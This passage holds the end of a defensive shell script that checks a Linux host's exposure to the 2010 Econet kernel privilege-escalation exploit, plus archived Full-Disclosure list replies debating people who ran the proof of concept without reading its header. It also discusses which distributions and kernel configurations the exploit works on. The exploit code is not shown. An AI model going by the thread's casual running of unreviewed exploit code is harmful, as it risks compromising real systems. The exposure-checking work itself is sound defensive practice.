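# or "alias net-pf-19 off" (the protocol-family alias is turned off, the form
# Debian/Ubuntu ship in blacklist-rare-network.conf). Comment lines are ignored.
econet_autoload_blocked() {
    dir="$1"
    for f in "$dir"/*.conf; do
        [ -f "$f" ] || continue
        if grep -v '^[[:space:]]*#' "$f" |
           grep -Eq '^[[:space:]]*(install[[:space:]]+econet[[:space:]]+/bin/(true|false)|alias[[:space:]]+net-pf-19[[:space:]]+off)[[:space:]]*$'; then
            return 0
        fi
    done
    return 1
}

# econet_exposure CONFIG_FILE MODPROBE_DIR
# Combines the two checks: "none" when the socket cannot be opened, "blocked"
# when Econet is a module whose auto-load is disabled, otherwise "exposed"
# (the host relies entirely on having the kernel patches applied).
econet_exposure() {
    case "$(econet_state "$1")" in
        absent)  echo none ;;
        builtin) echo exposed ;;
        module)
            if econet_autoload_blocked "$2"; then
                echo blocked
            else
                echo exposed
            fi ;;
    esac
}

# Run against the live system with: sh econet-check.sh --live
if [ "${1:-}" = "--live" ]; then
    echo "econet: $(econet_exposure "/boot/config-$(uname -r)" /etc/modprobe.d)"
fi
```

A result of "blocked" only says that a socket() call will not pull the module in; a module that is already loaded (check lsmod) or a built-in Econet still needs the distribution's fixes for the three issues listed in the exploit header. As Dan says in the thread, "none" means this particular exploit cannot work, not that the kernel is patched: the set_fs()/put_user() issue is independent of Econet and is only reachable through it in this proof of concept.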


Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]
Again, considering there was no nasty code in there, it was safe enough to
run.

Give it a break dude, you ain't going to get an argument out of me lol :)

On Mon, Dec 13, 2010 at 9:21 PM, Benji  wrote:

> I know in your perfect world nothing could ever break out of a sandbox, but
> this just isn't true.
>
> No more coco-pops for you, maybe some brain food!
>
>
> On Mon, Dec 13, 2010 at 9:19 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>>
>>1. It ran on a one-time server which gets re-generated every time it's
>>restarted (which is every time a testing session has finished)
>>2. I did a *very* brief look in the code for shell code etc, and based
>>on the noise already on the board, there wasn't any risk.
>>3. Even if there was dodgy shell code in there, it still would have
>>posed no risk, because the sandbox is re-generated every time (see comment
>>1)
>>
>> No more troll feed for you!
>>
>> On Mon, Dec 13, 2010 at 9:16 PM, Benji  wrote:
>>
>>> wait wait wait.
>>>
>>> you don't have time to read header notes, but do have time to run code you
>>> don't really know what it does on your system?
>>>
>>> can I send you some code? it's a linux 2.6.* 0day, remote root.
>>>
>>>
>>> On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> Sorry Dan, I did a very quick copy and paste job, without reading the
>>>> headers. I simply don't have time to read the code notes of every single
>>>> exploit released.
>>>>
>>>> I would say that, if you are fed up with being inundated with emails,
>>>> then perhaps you should mark these notes very clearly in big red
>>>> writing at the top of the email like this, for those people who don't
>>>> have much time to read these notes ;)
>>>>
>>>> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>>>>
>>>>> Please don't inundate me with e-mail because none of you bothered to
>>>>> read the exploit header.
>>>>>
>>>>> The exploit so far has a 100% success rate on the systems it was
>>>>> designed to work on.
>>>>>
>>>>> I don't think this is rocket science.  If your distribution does not
>>>>> compile Econet, then the exploit obviously won't be able to open an Econet
>>>>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>>>>> Slackware, and more.  This doesn't mean you're not vulnerable, it just 
>>>>> means
>>>>> this particular exploit won't work.
>>>>>
>>>>> If your distro doesn't export the relevant symbols (Debian), ditto
>>>>> above.
>>>>>
>>>>> If your distro has patched the Econet vulnerabilities I used to trigger
>>>>> this (Ubuntu), ditto above.
>>>>>
>>>>> This was done on purpose, to avoid giving a weaponized exploit to
>>>>> people who shouldn't have one.
>>>>>
>>>>> -Dan
>>>>>
>>>>>
>>>>> Sent from my Verizon Wireless BlackBerry
>>>>>
>>>>> -Original Message-
>>>>> From: "Cal Leeming [Simplicity Media Ltd]"
>>>>>
>>>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>>>> Date: Mon, 13 Dec 2010 20:40:45
>>>>> To: Ariel Biener
>>>>> Cc: ; ; <
>>>>> bugt...@securityfocus.com>; 
>>>>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>>
>>>> Cal Leeming
>>>>
>>>> Operational Security & Support Team
>>>>
>>>> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
>>>> supp...@simplicitymedialtd.co.uk
>>>> *Fax: *+44 (02476) 578987 | *Email: *
>>>> cal.leem...@simplicitymedialtd.co.uk
>>>> *IM: *AIM / ICQ / MSN / Skype (available 

Re: [Full-disclosure] Linux kernel exploit

2010-12-14 Thread Ariel Biener


Cal Leeming [Simplicity Media Ltd] wrote:
> Actually Ryan, I think you'll find a lot of people just wanted to
> contribute towards testing, as most authors will appreciate the masses
> testing on as many systems as possible.
>
> It's not a case of anyone "showing off", it's simply that a lot of
> people simply don't have time to read the "small print".

I am not sure that those kinds of testers are at all helpful to the
developer.


-- Ariel
 --
 Ariel Biener
 e-mail: ar...@post.tau.ac.il
 PGP: http://www.tau.ac.il/~ariel/pgp.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/